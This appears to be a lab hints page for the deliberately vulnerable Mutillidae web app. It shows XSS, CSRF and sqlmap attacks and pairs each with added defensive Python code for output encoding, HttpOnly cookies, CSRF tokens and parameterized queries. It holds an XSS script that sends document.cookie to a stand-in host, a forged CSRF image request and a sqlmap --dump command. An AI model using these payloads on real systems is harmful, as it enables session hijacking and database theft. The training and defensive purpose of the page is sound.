For XSS:
XSS is easy stuff. This one shows off both reflected (you see the results instantly) and stored (someone can run across it later in another app that uses the same database).
"<script>alert("XSS");</script>" is the classic, but there are far more interesting things you could do, which I plan to show in a video later.
For some hot cookie stealing action, try something like:
<script>
new Image().src="http://some-ip/mutillidae/catch.php?cookie="+encodeURI(document.cookie);
</script>
Check out RSnake's XSS Cheat Sheet for more ways you can encode XSS attacks that may allow you to get around some filters.
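The defensive counterpart to the hint above, as an added example that is not part of the original page or of Mutillidae's code: entity-encode untrusted data at the point where it is written into the page (which closes both the reflected and the stored case, since the encoding does not care where the string came from), and mark the session cookie HttpOnly so that document.cookie has nothing to hand to a script that does get through. The sample comments, the cookie name PHPSESSID and the session id are constructed assumptions.

```python
import html
from http.cookies import SimpleCookie

# Constructed sample comments (not real traffic): a benign one and the
# classic payload quoted in the hint above.
SAMPLE_COMMENTS = [
    "hi there monkeyboy & friends",
    '<script>alert("XSS");</script>',
]


def render_comment(comment: str) -> str:
    """Return the comment as an HTML list item with the text entity-encoded.

    html.escape turns <, >, &, " and ' into entities, so whatever the
    comment contains is shown as literal text and never parsed as markup.
    Encoding happens at output time, so it covers reflected input from the
    current request and stored input read back from the shared database.
    """
    return "<li>" + html.escape(comment, quote=True) + "</li>"


def render_comment_wall(comments) -> str:
    """Render a whole comment wall; every entry goes through render_comment."""
    return "<ul>" + "".join(render_comment(c) for c in comments) + "</ul>"


def session_cookie_header(session_id: str) -> str:
    """Build the Set-Cookie header for the session cookie.

    HttpOnly keeps the cookie out of document.cookie, so a script that does
    slip past the encoding cannot read it; Secure and SameSite=Lax limit
    where the browser will send it. The cookie name PHPSESSID is PHP's
    default and is an assumption about the app's session handling.
    """
    cookie = SimpleCookie()
    cookie["PHPSESSID"] = session_id
    cookie["PHPSESSID"]["httponly"] = True
    cookie["PHPSESSID"]["secure"] = True
    cookie["PHPSESSID"]["samesite"] = "Lax"
    return cookie.output(header="Set-Cookie:")


if __name__ == "__main__":
    print(render_comment_wall(SAMPLE_COMMENTS))
    print(session_cookie_header("constructed-session-id"))
```

Run it and the script tag comes out as `&lt;script&gt;...`, which the browser displays rather than executes; the cookie header carries HttpOnly, Secure and SameSite=Lax.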
For CSRF:
You can create another page someplace and make a link to an image that is not an image. You can also send someone an HTML email with a link inside. Sending links over HTML-aware instant messaging like Communicator also works. One of the quietest methods is to use HTML injection to poison a web page, thus creating a persistent attack. When a user visits the poisoned page, their browser will reach out to the target page. Using an AJAX request can keep the rogue transaction silent.
You could use something like the following:
<img src="http://localhost/mutillidae/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy">
This is the easy way to do CSRF with the GET method. Log in as someone, make your page with the image link someplace else, and then view it. You should now see something new on the comment wall.
For Cross Site Request Forgery, a tool like the Social Engineering Toolkit by Dave Kennedy can help.
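How a blog handler refuses the forged image request, as an added example that is not part of the page or of Mutillidae: the image tag sends a GET carrying only the victim's session cookie, so the handler requires a POST and a token that is bound to the session with an HMAC and embedded in the server's own form, which an attacker's page cannot compute. The handler, parameter names, secret and session id are constructed stand-ins.

```python
import hashlib
import hmac
import secrets

# Server-side secret, generated fresh for this demo; a real app loads it
# from configuration and keeps it out of the database and the page source.
SECRET_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """Derive the per-session token the server embeds in its own forms as a
    hidden field. It is bound to the session via HMAC, so a page on another
    origin cannot produce it without the server secret."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id: str, token) -> bool:
    """Constant-time comparison of the submitted token with the expected one."""
    if not isinstance(token, str) or not token:
        return False
    return hmac.compare_digest(issue_csrf_token(session_id), token)


def handle_add_to_blog(method: str, session_id: str, params: dict):
    """Constructed stand-in for a blog-entry handler (not Mutillidae's code).

    The forged <img> request in the hint is a GET with no token, carried only
    by the victim's session cookie. It is refused twice over: state changes
    require POST, and POST requires a valid token. Returns (status, message).
    """
    if method != "POST":
        return 405, "state-changing requests must use POST"
    if not verify_csrf_token(session_id, params.get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    return 200, "added blog entry: " + params.get("input_from_form", "")


if __name__ == "__main__":
    sid = "constructed-session-id"
    # Forged GET, as an <img src=...> on another page would send it.
    print(handle_add_to_blog("GET", sid, {"input_from_form": "hi there monkeyboy"}))
    # Legitimate POST from the server's own form, carrying the token.
    print(handle_add_to_blog("POST", sid,
                             {"input_from_form": "hi there monkeyboy",
                              "csrf_token": issue_csrf_token(sid)}))
```

The token check only helps if the token itself cannot be read by an attacker's page, so it goes in a hidden form field or a response body, never in a cookie alone.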
For sqlmap:
To use sqlmap, you need to know the page URL. We can get that by viewing requests and responses with HTTPFox, Paros, Burp, etc. We decide whether to attack via GET or POST. sqlmap will automatically test URL query parameters supplied in the URL that you give. To tell sqlmap about POST parameters, use the "--data" switch. Discover all the POST parameters using a tool like Burp to make this part easy.
Use the sqlmap help. Type python sqlmap.py -h.
When you're ready, string all this information together:
python sqlmap.py --url="http://192.168.56.101/mutillidae/index.php?page=view-someones-blog.php" --data="author=6C57C4B5-B341-4539-977B-7ACB9D42985A&view-someones-blog-php-submit-button=View+Blog+Entries" --level=1 --beep --dump
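What sqlmap is probing for in that author parameter, and the fix, as an added example that is not part of the page or of Mutillidae: a handler that pastes the parameter into the SQL text lets the input change the statement's structure (a single quote in a name is enough to break the query, which is the kind of error response injection testing looks for), while a parameterized statement binds the value separately so the database never parses it as SQL. The table, the second row and the handler functions are constructed; the author value is the one from the command above.

```python
import sqlite3

# Constructed in-memory table standing in for the blog storage; the first
# author value is the one used in the sqlmap command, the rest is made up.
SAMPLE_ROWS = [
    ("6C57C4B5-B341-4539-977B-7ACB9D42985A", "first post"),
    ("O'Brien", "a name containing a quote"),
]


def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE blog_entries (author TEXT, comment TEXT)")
    con.executemany("INSERT INTO blog_entries VALUES (?, ?)", SAMPLE_ROWS)
    return con


def view_blog_concat(con, author: str):
    """The pattern sqlmap looks for: the parameter is pasted into the SQL
    text, so its characters become part of the statement's structure."""
    sql = "SELECT comment FROM blog_entries WHERE author = '" + author + "'"
    return [row[0] for row in con.execute(sql)]


def view_blog_parameterized(con, author: str):
    """The fix: the statement is fixed text and the author value is bound
    separately, so the database never interprets it as SQL."""
    sql = "SELECT comment FROM blog_entries WHERE author = ?"
    return [row[0] for row in con.execute(sql, (author,))]


def input_changes_query_structure(con, author: str) -> bool:
    """True when the concatenating handler cannot parse its own statement,
    i.e. when the input altered the SQL rather than just a compared value."""
    try:
        view_blog_concat(con, author)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    con = build_db()
    for author in ("6C57C4B5-B341-4539-977B-7ACB9D42985A", "O'Brien"):
        print(author, "parameterized ->", view_blog_parameterized(con, author))
        print(author, "breaks concatenated query ->",
              input_changes_query_structure(con, author))
```

The parameterized version returns O'Brien's entry normally; the concatenated one throws a syntax error on the same input, which is exactly the symptom a scanner keys on.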